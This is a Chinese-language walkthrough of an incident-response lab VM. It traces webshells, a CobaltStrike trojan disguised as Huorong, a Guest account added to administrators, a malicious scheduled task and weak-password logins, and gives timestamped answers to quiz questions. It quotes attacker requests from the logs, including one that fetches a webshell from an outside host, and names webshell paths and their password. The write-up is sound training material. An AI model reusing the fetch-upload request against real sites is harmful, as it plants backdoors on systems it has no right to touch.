应急靶机02: Where-1S-tHe-Hacker-P2

admin
admin
admin
102803
文章
87
评论
2024年4月26日07:15:12评论4 views字数 2088阅读6分57秒阅读模式

免责声明

文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

靶机

压缩包解压后运行Where-1s-tHe-Hacker-P2.vmx文件,同意获取所有权

启动虚拟机

应急靶机02: Where-1S-tHe-Hacker-P2

输入提供的靶机用户名和密码 admin / Aa123456 进入到桌面

题解

本文仅供学习参考,解题思路不唯一,不必局限。

划水应急工具包中Webshell查杀d_safe_2.1.8.1.zip把D盾复制粘贴到靶机中解压使用。

右键管理员运行D盾,扫描WEB目录C:phpstudy_proWWW

应急靶机02: Where-1S-tHe-Hacker-P2
应急靶机02: Where-1S-tHe-Hacker-P2
1.最早的WebShell落地时间是?(时间格式统一为:2022/12/12/2:22:22)
2023/11/11/0:30:07

2.上题WebShell的连接密码是?
pass

上杀软做个全盘扫描,这里以火绒为例

应急靶机02: Where-1S-tHe-Hacker-P2
应急靶机02: Where-1S-tHe-Hacker-P2

存在伪装为火绒安全软件的CobaltStrike远程控制木马

路径为C:WindowsTemphuorong.exe

查看文件属性创建时间为:2023年11月15日,7:45:47

应急靶机02: Where-1S-tHe-Hacker-P2

微步在线云沙箱-样本检测分析

https://s.threatbook.com/

应急靶机02: Where-1S-tHe-Hacker-P2
3.CobaltStrike远程控制木马的文件名与落地时间是?(答案格式:ABC.exe,2022/12/12/2:22:22)
huorong.exe,2023/11/15/7:45:47

D盾克隆账号检测功能检测出Guest账号被启用并添加进管理员组

应急靶机02: Where-1S-tHe-Hacker-P2

启用时间为2023年11月11日0:45:59

应急靶机02: Where-1S-tHe-Hacker-P2
4.启用并添加进管理员组的用户与时间是?(答案格式:Username,2022/12/12/2:22:22)
Guest,2023/11/11/0:45:59

划水应急工具系统综合分析火绒剑独立版 v2021.06.01.zip把火绒剑复制粘贴到靶机中解压使用。

排查计划任务发现:伪装的CobaltStrike远程控制木马被添加进计划任务

应急靶机02: Where-1S-tHe-Hacker-P2

按WIN+R键,输入taskschd.msc启动任务计划程序,定位到MicrosoftWindowsAppID

应急靶机02: Where-1S-tHe-Hacker-P2

右键导出异常计划任务Microsoft-SysnomCon,注册时间为2023年11月15日8:02:20

应急靶机02: Where-1S-tHe-Hacker-P2
5.CobaltStrike木马被添加进计划任务的时间是?
2023/11/15/8:02:20

日志审计回溯部分

弱口令登录ftp

日志:C:phpstudy_proExtensionsFTP0.9.60Logsfzs-2023-11-11.log

应急靶机02: Where-1S-tHe-Hacker-P2

验证弱口令:ftp/123456

应急靶机02: Where-1S-tHe-Hacker-P2
6.攻击者使用弱口令登录ftp的时间是?
2023/11/11/1:08:54

弱口令登录web管理员

日志:C:phpstudy_proExtensionsApache2.4.39logsaccess.log.1700006400

应急靶机02: Where-1S-tHe-Hacker-P2

验证弱口令:admin/123456

应急靶机02: Where-1S-tHe-Hacker-P2
7.攻击者使用弱口令登录web管理员的时间是?
2023/11/15/7:38:31

查看上传成功的回显路径

应急靶机02: Where-1S-tHe-Hacker-P2
http://192.168.11.130/index.php?mod=site&do=file&act=public&op=local&beid=1&page=1&year=0&month=0
应急靶机02: Where-1S-tHe-Hacker-P2

url参数的值就是上传的一句话木马URL

http://192.168.11.130/attachment/php/2023/11/Fpin0pP6AIZnP84.php
/转换为/
http://192.168.11.130/attachment/php/2023/11/Fpin0pP6AIZnP84.php
应急靶机02: Where-1S-tHe-Hacker-P2
8.攻击者查看上传回显路径的时间是?
2023/11/15/7:38:53

上传一句话木马

应急靶机02: Where-1S-tHe-Hacker-P2

验证

应急靶机02: Where-1S-tHe-Hacker-P2
http://192.168.13.131/index.php?mod=site&do=file&act=public&op=fetch&beid=1&url=http://10.120.45.241/4.php
应急靶机02: Where-1S-tHe-Hacker-P2
http://192.168.13.131/attachment/php/2023/11/FN8LG853Z83k0k3.php
转换
http://192.168.13.131/attachment/php/2023/11/FN8LG853Z83k0k3.php
应急靶机02: Where-1S-tHe-Hacker-P2

一句话木马落地

应急靶机02: Where-1S-tHe-Hacker-P2

连接验证

http://192.168.11.130/attachment/php/2023/11/qD97v39luG9Ool6.php
pass
应急靶机02: Where-1S-tHe-Hacker-P2
9.第二批WebShell的最早上传时间是?
2023/11/15/7:40:10

一句话木马开始通信

应急靶机02: Where-1S-tHe-Hacker-P2
应急靶机02: Where-1S-tHe-Hacker-P2
应急靶机02: Where-1S-tHe-Hacker-P2
10.根据上题线索,WebShell开始通信的时间是?
2023/11/15/7:42:36

整理

应急靶机02: Where-1S-tHe-Hacker-P2

参考报告

百度网盘
链接:https://pan.baidu.com/s/1iRDhuJl0fS7xBO0qGvflHQ?pwd=kd4e
提取码:kd4e

应急靶机02: Where-1S-tHe-Hacker-P2

 

原文始发于微信公众号(划水但不摆烂):【实景挑战 | 题解】应急靶机02: Where-1S-tHe-Hacker-P2

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月26日07:15:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   应急靶机02: Where-1S-tHe-Hacker-P2https://cn-sec.com/archives/2689940.html

发表评论

匿名网友 填写信息